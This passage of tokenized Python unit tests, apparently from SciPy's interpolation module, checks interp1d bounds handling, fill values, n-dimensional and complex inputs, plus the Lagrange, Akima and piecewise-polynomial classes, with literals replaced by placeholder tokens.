array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> def _bounds_check ( self , kind = '<STR_LIT>' ) : <EOL> extrap10 = interp1d ( self . x10 , self . y10 , fill_value = self . fill_value , <EOL> bounds_error = False , kind = kind ) <EOL> assert_array_equal ( extrap10 ( <NUM_LIT> ) , np . array ( self . fill_value ) ) <EOL> assert_array_equal ( extrap10 ( - <NUM_LIT> ) , np . array ( self . fill_value ) ) <EOL> assert_array_equal ( extrap10 ( [ [ [ <NUM_LIT> ] , [ - <NUM_LIT> ] , [ <NUM_LIT> ] , [ <NUM_LIT> ] ] ] ) , <EOL> np . array ( self . fill_value ) , ) <EOL> assert_array_equal ( extrap10 . _check_bounds ( <EOL> np . array ( [ - <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) , <EOL> np . array ( [ [ True , False , False , False , False ] , <EOL> [ False , False , False , False , True ] ] ) ) <EOL> raises_bounds_error = interp1d ( self . x10 , self . y10 , bounds_error = True , <EOL> kind = kind ) <EOL> assert_raises ( ValueError , raises_bounds_error , - <NUM_LIT:1.0> ) <EOL> assert_raises ( ValueError , raises_bounds_error , <NUM_LIT> ) <EOL> raises_bounds_error ( [ <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> def _bounds_check_int_nan_fill ( self , kind = '<STR_LIT>' ) : <EOL> x = np . arange ( <NUM_LIT:10> ) . astype ( np . int_ ) <EOL> y = np . arange ( <NUM_LIT:10> ) . astype ( np . int_ ) <EOL> c = interp1d ( x , y , kind = kind , fill_value = np . nan , bounds_error = False ) <EOL> yi = c ( x - <NUM_LIT:1> ) <EOL> assert_ ( np . isnan ( yi [ <NUM_LIT:0> ] ) ) <EOL> assert_array_almost_equal ( yi , np . r_ [ np . nan , y [ : - <NUM_LIT:1> ] ] ) <EOL> def test_bounds ( self ) : <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _bounds_check ( kind ) <EOL> self . _bounds_check_int_nan_fill ( kind ) <EOL> def _check_fill_value ( self , kind ) : <EOL> interp = interp1d ( self . x10 , self . 
y10 , kind = kind , <EOL> fill_value = ( - <NUM_LIT:100> , <NUM_LIT:100> ) , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , - <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ - <NUM_LIT:100> , <NUM_LIT:100> ] ) <EOL> for y in ( self . y235 , self . y325 , self . y225 , self . y25 ) : <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = <NUM_LIT:100> , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , <NUM_LIT:100> ) <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = ( - <NUM_LIT:100> , <NUM_LIT:100> ) , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , - <NUM_LIT:100> ) <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] ] * y . shape [ <NUM_LIT:1> ] ] * y . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> result = [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , result ) <EOL> fill_value = [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] <EOL> for y in ( self . y325 , self . y225 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> interp = interp1d ( self . x5 , self . 
y235 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ <NUM_LIT:200> , <NUM_LIT:200> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] ] ] * <NUM_LIT:2> ) <EOL> fill_value = [ <NUM_LIT:100> , <NUM_LIT:200> ] <EOL> assert_raises ( ValueError , interp1d , self . x5 , self . y235 , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for y in ( self . y225 , self . y325 , self . y25 ) : <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> result = [ <NUM_LIT:100> , <NUM_LIT:200> ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , result ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , result ) <EOL> result = [ [ <NUM_LIT:100> , <NUM_LIT:100> ] , [ <NUM_LIT:200> , <NUM_LIT:200> ] ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , result ) <EOL> fill_value = ( np . array ( [ - <NUM_LIT:100> , - <NUM_LIT:200> , - <NUM_LIT> ] ) , <NUM_LIT:100> ) <EOL> for y in ( self . y325 , self . y225 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> interp = interp1d ( self . x5 , self . 
y235 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ - <NUM_LIT:100> , - <NUM_LIT:200> , - <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ - <NUM_LIT:200> , <NUM_LIT:100> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT:100> ] ] ] * <NUM_LIT:2> ) <EOL> fill_value = ( np . array ( [ - <NUM_LIT:100> , - <NUM_LIT:200> ] ) , <NUM_LIT:100> ) <EOL> assert_raises ( ValueError , interp1d , self . x5 , self . y235 , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for y in ( self . y225 , self . y325 , self . y25 ) : <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , <NUM_LIT:100> ) <EOL> result = [ - <NUM_LIT:100> , - <NUM_LIT:200> ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , result ) <EOL> result = [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , [ - <NUM_LIT:200> , <NUM_LIT:100> ] ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , result ) <EOL> fill_value = ( [ - <NUM_LIT:100> , - <NUM_LIT:200> , - <NUM_LIT> ] , [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] ) <EOL> for y in ( self . y325 , self . y225 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for ii in range ( <NUM_LIT:2> ) : <EOL> if ii == <NUM_LIT:1> : <EOL> fill_value = tuple ( np . 
array ( f ) for f in fill_value ) <EOL> interp = interp1d ( self . x5 , self . y235 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ - <NUM_LIT:100> , - <NUM_LIT:200> , - <NUM_LIT> ] ] * <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ - <NUM_LIT:200> , <NUM_LIT:200> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] ] ] * <NUM_LIT:2> ) <EOL> fill_value = ( [ - <NUM_LIT:100> , - <NUM_LIT:200> ] , [ <NUM_LIT:100> , <NUM_LIT:200> ] ) <EOL> assert_raises ( ValueError , interp1d , self . x5 , self . y235 , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for y in ( self . y325 , self . y225 , self . y25 ) : <EOL> interp = interp1d ( self . x5 , y , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> result = [ <NUM_LIT:100> , <NUM_LIT:200> ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , result ) <EOL> result = [ - <NUM_LIT:100> , - <NUM_LIT:200> ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , result ) <EOL> result = [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , [ - <NUM_LIT:200> , <NUM_LIT:200> ] ] <EOL> if y . ndim == <NUM_LIT:3> : <EOL> result = [ result ] * y . shape [ <NUM_LIT:0> ] <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , result ) <EOL> fill_value = [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] <EOL> for y in ( self . y235 , self . y325 , self . 
y25 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for ii in range ( <NUM_LIT:2> ) : <EOL> if ii == <NUM_LIT:1> : <EOL> fill_value = np . array ( fill_value ) <EOL> interp = interp1d ( self . x5 , self . y225 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ <NUM_LIT:200> , <NUM_LIT:200> ] ] , <EOL> [ [ <NUM_LIT:1000> , <NUM_LIT:1000> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] ] ] ) <EOL> fill_value = ( [ [ - <NUM_LIT:100> , - <NUM_LIT:200> ] , [ - <NUM_LIT:1000> , - <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] ) <EOL> for y in ( self . y235 , self . y325 , self . y25 ) : <EOL> assert_raises ( ValueError , interp1d , self . x5 , y , kind = kind , <EOL> axis = - <NUM_LIT:1> , fill_value = fill_value , bounds_error = False ) <EOL> for ii in range ( <NUM_LIT:2> ) : <EOL> if ii == <NUM_LIT:1> : <EOL> fill_value = ( np . array ( fill_value [ <NUM_LIT:0> ] ) , np . array ( fill_value [ <NUM_LIT:1> ] ) ) <EOL> interp = interp1d ( self . x5 , self . 
y225 , kind = kind , axis = - <NUM_LIT:1> , <EOL> fill_value = fill_value , bounds_error = False ) <EOL> assert_array_almost_equal ( interp ( <NUM_LIT:10> ) , [ [ <NUM_LIT:100> , <NUM_LIT:200> ] , [ <NUM_LIT:1000> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( - <NUM_LIT:10> ) , [ [ - <NUM_LIT:100> , - <NUM_LIT:200> ] , <EOL> [ - <NUM_LIT:1000> , - <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( [ - <NUM_LIT:10> , <NUM_LIT:10> ] ) , [ [ [ - <NUM_LIT:100> , <NUM_LIT:100> ] , <EOL> [ - <NUM_LIT:200> , <NUM_LIT:200> ] ] , <EOL> [ [ - <NUM_LIT:1000> , <NUM_LIT:1000> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] ] ] ) <EOL> def test_fill_value ( self ) : <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> self . _check_fill_value ( kind ) <EOL> def test_fill_value_writeable ( self ) : <EOL> interp = interp1d ( self . x10 , self . y10 , fill_value = <NUM_LIT> ) <EOL> assert_equal ( interp . fill_value , <NUM_LIT> ) <EOL> interp . fill_value = <NUM_LIT> <EOL> assert_equal ( interp . fill_value , <NUM_LIT> ) <EOL> def _nd_check_interp ( self , kind = '<STR_LIT>' ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 , kind = kind ) <EOL> assert_array_almost_equal ( interp10 ( np . array ( [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) ) , <EOL> np . array ( [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) ) <EOL> assert_ ( isinstance ( interp10 ( <NUM_LIT> ) , np . ndarray ) ) <EOL> assert_equal ( interp10 ( <NUM_LIT> ) . shape , ( ) ) <EOL> interp210 = interp1d ( self . x10 , self . y210 , kind = kind ) <EOL> assert_array_almost_equal ( interp210 ( <NUM_LIT:1.> ) , np . array ( [ <NUM_LIT:1.> , <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp210 ( np . array ( [ <NUM_LIT:1.> , <NUM_LIT> ] ) ) , <EOL> np . array ( [ [ <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) ) <EOL> interp102 = interp1d ( self . x10 , self . 
y102 , axis = <NUM_LIT:0> , kind = kind ) <EOL> assert_array_almost_equal ( interp102 ( <NUM_LIT:1.> ) , np . array ( [ <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp102 ( np . array ( [ <NUM_LIT:1.> , <NUM_LIT> ] ) ) , <EOL> np . array ( [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) ) <EOL> x_new = np . array ( [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp210 ( x_new ) , <EOL> np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ] ) ) <EOL> assert_array_almost_equal ( interp102 ( x_new ) , <EOL> np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] ] ) ) <EOL> def _nd_check_shape ( self , kind = '<STR_LIT>' ) : <EOL> a = [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] <EOL> y = np . arange ( np . prod ( a ) ) . reshape ( * a ) <EOL> for n , s in enumerate ( a ) : <EOL> x = np . arange ( s ) <EOL> z = interp1d ( x , y , axis = n , kind = kind ) <EOL> assert_array_almost_equal ( z ( x ) , y , err_msg = kind ) <EOL> x2 = np . arange ( <NUM_LIT:2> * <NUM_LIT:3> * <NUM_LIT:1> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) ) / <NUM_LIT> <EOL> b = list ( a ) <EOL> b [ n : n + <NUM_LIT:1> ] = [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ] <EOL> assert_array_almost_equal ( z ( x2 ) . shape , b , err_msg = kind ) <EOL> def test_nd ( self ) : <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _nd_check_interp ( kind ) <EOL> self . _nd_check_shape ( kind ) <EOL> def _check_complex ( self , dtype = np . complex_ , kind = '<STR_LIT>' ) : <EOL> x = np . array ( [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:10> ] ) <EOL> y = x * x ** ( <NUM_LIT:1> + <NUM_LIT> ) <EOL> y = y . 
astype ( dtype ) <EOL> c = interp1d ( x , y , kind = kind ) <EOL> assert_array_almost_equal ( y [ : - <NUM_LIT:1> ] , c ( x ) [ : - <NUM_LIT:1> ] ) <EOL> xi = np . linspace ( <NUM_LIT:1> , <NUM_LIT:10> , <NUM_LIT> ) <EOL> cr = interp1d ( x , y . real , kind = kind ) <EOL> ci = interp1d ( x , y . imag , kind = kind ) <EOL> assert_array_almost_equal ( c ( xi ) . real , cr ( xi ) ) <EOL> assert_array_almost_equal ( c ( xi ) . imag , ci ( xi ) ) <EOL> def test_complex ( self ) : <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> self . _check_complex ( np . complex64 , kind ) <EOL> self . _check_complex ( np . complex128 , kind ) <EOL> @ dec . knownfailureif ( True , "<STR_LIT>" ) <EOL> def test_nd_zero_spline ( self ) : <EOL> pass <EOL> def test_circular_refs ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> with assert_deallocated ( interp1d , x , y ) as interp : <EOL> new_y = interp ( [ <NUM_LIT:0.1> , <NUM_LIT> ] ) <EOL> del interp <EOL> class TestLagrange ( TestCase ) : <EOL> def test_lagrange ( self ) : <EOL> p = poly1d ( [ <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:3> ] ) <EOL> xs = np . arange ( len ( p . coeffs ) ) <EOL> ys = p ( xs ) <EOL> pl = lagrange ( xs , ys ) <EOL> assert_array_almost_equal ( p . coeffs , pl . coeffs ) <EOL> class TestAkima1DInterpolator ( TestCase ) : <EOL> def test_eval ( self ) : <EOL> x = np . arange ( <NUM_LIT:0.> , <NUM_LIT> ) <EOL> y = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> xi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:0.5> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi = np . 
array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> assert_allclose ( ak ( xi ) , yi ) <EOL> def test_eval_2d ( self ) : <EOL> x = np . arange ( <NUM_LIT:0.> , <NUM_LIT> ) <EOL> y = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> y = np . column_stack ( ( y , <NUM_LIT> * y ) ) <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> xi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:0.5> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi = np . column_stack ( ( yi , <NUM_LIT> * yi ) ) <EOL> assert_allclose ( ak ( xi ) , yi ) <EOL> def test_eval_3d ( self ) : <EOL> x = np . arange ( <NUM_LIT:0.> , <NUM_LIT> ) <EOL> y_ = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> y = np . empty ( ( <NUM_LIT:11> , <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> y [ : , <NUM_LIT:0> , <NUM_LIT:0> ] = y_ <EOL> y [ : , <NUM_LIT:1> , <NUM_LIT:0> ] = <NUM_LIT> * y_ <EOL> y [ : , <NUM_LIT:0> , <NUM_LIT:1> ] = <NUM_LIT> * y_ <EOL> y [ : , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT> * y_ <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> xi = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:0.5> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi = np . empty ( ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> yi_ = np . 
array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> yi [ : , <NUM_LIT:0> , <NUM_LIT:0> ] = yi_ <EOL> yi [ : , <NUM_LIT:1> , <NUM_LIT:0> ] = <NUM_LIT> * yi_ <EOL> yi [ : , <NUM_LIT:0> , <NUM_LIT:1> ] = <NUM_LIT> * yi_ <EOL> yi [ : , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT> * yi_ <EOL> assert_allclose ( ak ( xi ) , yi ) <EOL> def test_degenerate_case_multidimensional ( self ) : <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> y = np . vstack ( ( x , x ** <NUM_LIT:2> ) ) . T <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> x_eval = np . array ( [ <NUM_LIT:0.5> , <NUM_LIT> ] ) <EOL> y_eval = ak ( x_eval ) <EOL> assert_allclose ( y_eval , np . vstack ( ( x_eval , x_eval ** <NUM_LIT:2> ) ) . T ) <EOL> def test_extend ( self ) : <EOL> x = np . arange ( <NUM_LIT:0.> , <NUM_LIT> ) <EOL> y = np . array ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ak = Akima1DInterpolator ( x , y ) <EOL> try : <EOL> ak . extend ( None , None ) <EOL> except NotImplementedError as e : <EOL> if str ( e ) != ( "<STR_LIT>" <EOL> "<STR_LIT>" ) : <EOL> raise <EOL> except : <EOL> raise <EOL> class TestPPolyCommon ( TestCase ) : <EOL> def test_sort_check ( self ) : <EOL> c = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:4> ] , [ <NUM_LIT:2> , <NUM_LIT:5> ] , [ <NUM_LIT:3> , <NUM_LIT:6> ] ] ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.5> ] ) <EOL> assert_raises ( ValueError , PPoly , c , x ) <EOL> assert_raises ( ValueError , BPoly , c , x ) <EOL> def test_extend ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> order = <NUM_LIT:3> <EOL> x = np . unique ( np . r_ [ <NUM_LIT:0> , <NUM_LIT:10> * np . random . rand ( <NUM_LIT:30> ) , <NUM_LIT:10> ] ) <EOL> c = <NUM_LIT:2> * np . random . 
rand ( order + <NUM_LIT:1> , len ( x ) - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) - <NUM_LIT:1> <EOL> for cls in ( PPoly , BPoly ) : <EOL> pp = cls ( c [ : , : <NUM_LIT:9> ] , x [ : <NUM_LIT:10> ] ) <EOL> pp . extend ( c [ : , <NUM_LIT:9> : ] , x [ <NUM_LIT:10> : ] ) <EOL> pp2 = cls ( c [ : , <NUM_LIT:10> : ] , x [ <NUM_LIT:10> : ] ) <EOL> pp2 . extend ( c [ : , : <NUM_LIT:10> ] , x [ : <NUM_LIT:10> ] , right = False ) <EOL> pp3 = cls ( c , x ) <EOL> assert_array_equal ( pp . c , pp3 . c ) <EOL> assert_array_equal ( pp . x , pp3 . x ) <EOL> assert_array_equal ( pp2 . c , pp3 . c ) <EOL> assert_array_equal ( pp2 . x , pp3 . x ) <EOL> def test_extend_diff_orders ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:6> ) <EOL> c = np . random . rand ( <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> x2 = np . linspace ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> ) <EOL> c2 = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> pp1 = cls ( c , x ) <EOL> pp2 = cls ( c2 , x2 ) <EOL> pp_comb = cls ( c , x ) <EOL> pp_comb . extend ( c2 , x2 [ <NUM_LIT:1> : ] ) <EOL> xi1 = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> , endpoint = False ) <EOL> xi2 = np . linspace ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> ) <EOL> assert_allclose ( pp1 ( xi1 ) , pp_comb ( xi1 ) ) <EOL> assert_allclose ( pp2 ( xi2 ) , pp_comb ( xi2 ) ) <EOL> def test_shape ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:8> , <NUM_LIT:12> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) <EOL> x = np . sort ( np . random . rand ( <NUM_LIT> ) ) <EOL> xp = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> p = cls ( c , x ) <EOL> assert_equal ( p ( xp ) . shape , ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) ) 